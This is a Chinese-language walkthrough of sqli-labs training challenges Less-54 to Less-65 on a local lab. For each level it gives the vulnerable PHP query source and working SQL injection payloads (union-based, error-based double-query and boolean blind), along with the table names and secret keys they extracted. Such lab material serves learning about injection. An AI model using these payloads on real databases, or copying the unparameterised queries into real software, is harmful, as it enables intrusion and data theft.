SQLI-LAB 的 实战记录(Less 54 - Less 65)
以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录,仅供参考。 因为本人学过一些sql注入的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。
Less - 54 Challenge-1
(第54节:挑战 - 1)
Test:
http://localhost/sqli-lab/Less-54/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 10 attempts 注:数据库名:challenges 最多尝试次数:10
http://localhost/sqli-lab/Less-54/index.php?id=1') union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-54/index.php?id=1' union select 1,2,3 --+
注:正常,id周围是单引号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
//2x51x9lc2b
http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='2x51x9lc2b' --+
//id,sessid,secret_QD6G,tryy
http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(secret_QD6G),group_concat(sessid) from challenges.2x51x9lc2b --+
//t5OPJLdkJ60DsyF7T1ZL3rfD
//140491cdf5b17300fc51147a33ae86bf
注:正则匹配直接暴表名,列名:
http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,table_name,column_name from information_schema.columns where column_name regexp '^secret_[A-Z]{4}$' limit 0,1;
Less - 55 Challenge-2
(第55节:挑战 - 2)
Test:
http://localhost/sqli-lab/Less-55/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 14 attempts 注:数据库名:challenges 最多尝试次数:14
http://localhost/sqli-lab/Less-55/index.php?id=1' union select 1,2,3 --+
http://localhost/sqli-lab/Less-55/index.php?id=1') union select 1,2,3 --+
http://localhost/sqli-lab/Less-55/index.php?id=1" union select 1,2,3 --+
http://localhost/sqli-lab/Less-55/index.php?id=1") union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-55/index.php?id=1) union select 1,2,3 --+
注:正常,id周围是一层括号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
// tyqb9xz99r
http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='tyqb9xz99r' --+
// id,sessid,secret_0LLE,tryy
http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(secret_0LLE),group_concat(sessid) from challenges.tyqb9xz99r --+
// HvXC6g9NxUeGwZtpfdEYCtUO
// 486412045b0a355f953e5aa5c8446bcb
Less - 56 Challenge-3
(第56节:挑战 - 3)
Test:
http://localhost/sqli-lab/Less-56/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 14 attempts 注:数据库名:challenges 最多尝试次数:14
http://localhost/sqli-lab/Less-56/index.php?id=1' union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-56/index.php?id=1') union select 1,2,3 --+
http://localhost/sqli-lab/Less-56/index.php?id=1" union select 1,2,3 --+
http://localhost/sqli-lab/Less-56/index.php?id=1") union select 1,2,3 --+
注:正常,id周围是双引号和一层括号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
// l1meh6v8xf
http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l1meh6v8xf' --+
// id,sessid,secret_ZIEU,tryy
http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(secret_ZIEU),group_concat(sessid) from challenges.l1meh6v8xf --+
//3zjx2Ef32x2clWJlRlS4n2wc
// 2de68a7c5e3db6a836ab8f5f109416b8
Less - 57 Challenge-4
(第57节:挑战 - 4)
Test:
http://localhost/sqli-lab/Less-57/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 14 attempts 注:数据库名:challenges 最多尝试次数:14
http://localhost/sqli-lab/Less-57/index.php?id=1") union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-57/index.php?id=1' union select 1,2,3 --+
http://localhost/sqli-lab/Less-57/index.php?id=1') union select 1,2,3 --+
http://localhost/sqli-lab/Less-57/index.php?id=1" union select 1,2,3 --+
注:正常,id周围是双引号
Sourse Code:
$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
// la5spfxomc
http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='la5spfxomc' --+
// id,sessid,secret_D2E9,tryy
http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(secret_D2E9),group_concat(sessid) from challenges.la5spfxomc --+
// AkXpuSMRL2Mjnxbu6ChgdDkI
// 2c26f9a59b0ba61233e6fc0af8e47f14
Less - 58 Challenge-5
(第58节:挑战 - 5)
Test:
http://localhost/sqli-lab/Less-58/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 5 attempts 注:数据库名:challenges 最多尝试次数:5
http://localhost/sqli-lab/Less-58/index.php?id=1' union select 1,2,3 --+
注:正常
http://localhost/sqli-lab/Less-58/index.php?id=1') union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') union select 1,2,3 -- ' LIMIT 0,1' at line 1 注:id周围是单引号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//qrso3pw6sh::challenges::1
http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='qrso3pw6sh' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//id,sessid,secret_MV87,tryy::1
http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(secret_MV87,0x3a, 0x3a) from challenges.qrso3pw6sh limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// 3XJM8hjFz6KNK5aoNUSApgRW::1
Less - 59 Challenge-6
(第59节:挑战 - 6)
Test:
http://localhost/sqli-lab/Less-59/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 5 attempts 注:数据库名:challenges 最多尝试次数:5
http://localhost/sqli-lab/Less-59/index.php?id=1' union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' union select 1,2,3 -- LIMIT 0,1' at line 1 注:id周围没有符号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// b3ndcj1o8v::challenges::1
http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='b3ndcj1o8v' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//id,sessid,secret_ZWS2,tryy::1
http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(secret_ZWS2 ,0x3a, 0x3a) from challenges.b3ndcj1o8v limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// zhEVMVgMavK0k92OSv8zmTTm::1
Less - 60 Challenge-7
(第60节:挑战 - 7)
Test:
http://localhost/sqli-lab/Less-60/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 5 attempts 注:数据库名:challenges 最多尝试次数:5
http://localhost/sqli-lab/Less-60/index.php?id=1" union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3 -- ") LIMIT 0,1' at line 1 注:id周围是双引号和一层括号
Sourse Code:
$id = '("'.$id.'")';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//p9gd2w7p0n::challenges::1
http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='p9gd2w7p0n' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//id,sessid,secret_THZK,tryy::1
http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(secret_THZK ,0x3a, 0x3a) from challenges.p9gd2w7p0n limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// OSpAsCGlNQ8qbUtTnEXHd0WL::1
Less - 61 Challenge-8
(第61节:挑战 - 8)
Test:
http://localhost/sqli-lab/Less-61/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 5 attempts 注:数据库名:challenges 最多尝试次数:5
http://localhost/sqli-lab/Less-61/index.php?id=1' union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3 -- ')) LIMIT 0,1' at line 1 注:id周围是单引号和两层括号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//t44dfrest6::challenges::1
http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='t44dfrest6' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
//id,sessid,secret_BN4M,tryy::1
http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(secret_BN4M,0x3a, 0x3a) from challenges.t44dfrest6 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
// dqlfs35mo8ZZlYKFZIvXboSe::1
Less - 62 Challenge-9
(第62节:挑战 - 9)
Test:
http://localhost/sqli-lab/Less-62/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 130 attempts 注:数据库名:challenges 最多尝试次数:130
http://localhost/sqli-lab/Less-62/index.php?id=1' union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-62/index.php?id=1') union select 1,2,3 --+
注:正常,id周围是单引号和一层括号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 97 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 109 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 115 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 119 --+
//表名 第一个字符:w
// wlo99z7cua
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 16) = 16 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 4) = 4 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 2) = 2 --+
//10110 = 22 ,列名中倒数第四个字符:V
// secret_VUBV
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 64 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 53 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 50 --+
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select secret_VUBV from wlo99z7cua limit 0,1),1,1)) %26 1) = 1 --+
// key 的 第一个字符:1
// 1kqTprKdfAt6VGFEoEcpYgjG
注:随机值
表名 10位 由 小写字母和数字 组成
secret_XXXX 后四位由 大写字母和数字 组成
key 24位 由 大小写字母和数字 组成
Less - 63 Challenge-10
(第63节:挑战 - 10)
Test:
http://localhost/sqli-labess-63/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 130 attempts 注:数据库名:challenges 最多尝试次数:130
http://localhost/sqli-lab/Less-63/index.php?id=1') union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-63/index.php?id=1' union select 1,2,3 --+
注:正常,id周围是单引号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 64 --+
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 96 --+
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 77 --+
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 70 --+
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 73 --+
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ord(substr((select secret_8FVY from gelqg5ya7p limit 0,1),1,1)) %26 1) = 1 --+
// key 的 第一个字符:G
// Gd65kBLDXbCY7wrwRq5jzM4l
Less - 64 Challenge-11
(第64节:挑战 - 11)
Test:
http://localhost/sqli-lab/Less-64/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 130 attempts 注:数据库名:challenges 最多尝试次数:130
http://localhost/sqli-lab/Less-64/index.php?id=1' union select 1,2,3 --+
http://localhost/sqli-lab/Less-64/index.php?id=1') union select 1,2,3 --+
http://localhost/sqli-lab/Less-64/index.php?id=1" union select 1,2,3 --+
http://localhost/sqli-lab/Less-64/index.php?id=1") union select 1,2,3 --+
http://localhost/sqli-lab/Less-64/index.php?id=1) union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-64/index.php?id=1)) union select 1,2,3 --+
注:正常,id周围是两层括号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) > 64 --+
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) > 97 --+
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 109 --+
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 106 --+
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 104 --+
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) = 103 --+
// key 的 第一个字符:g
// gpu9QBywZI8jL2M7Uj6DDELa
Less - 65 Challenge-12
(第65节:挑战 - 12)
Test:
http://localhost/sqli-lab/Less-65/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database ('CHALLENGES') in Less than 130 attempts 注:数据库名:challenges 最多尝试次数:130
http://localhost/sqli-lab/Less-65/index.php?id=1" union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-65/index.php?id=1' union select 1,2,3 --+
http://localhost/sqli-lab/Less-65/index.php?id=1') union select 1,2,3 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") union select 1,2,3 --+
注:正常,id周围是双引号和一层括号
Sourse Code:
$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo 'Your Password : ' .$pass[$row['id']];
}else{
//print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 64 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 97 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 77 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 84 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 88 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 85 --+
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) = 87 --+
// key 的 第一个字符:W
// Wa0mYczFC0wFXygjAFaCA1Tb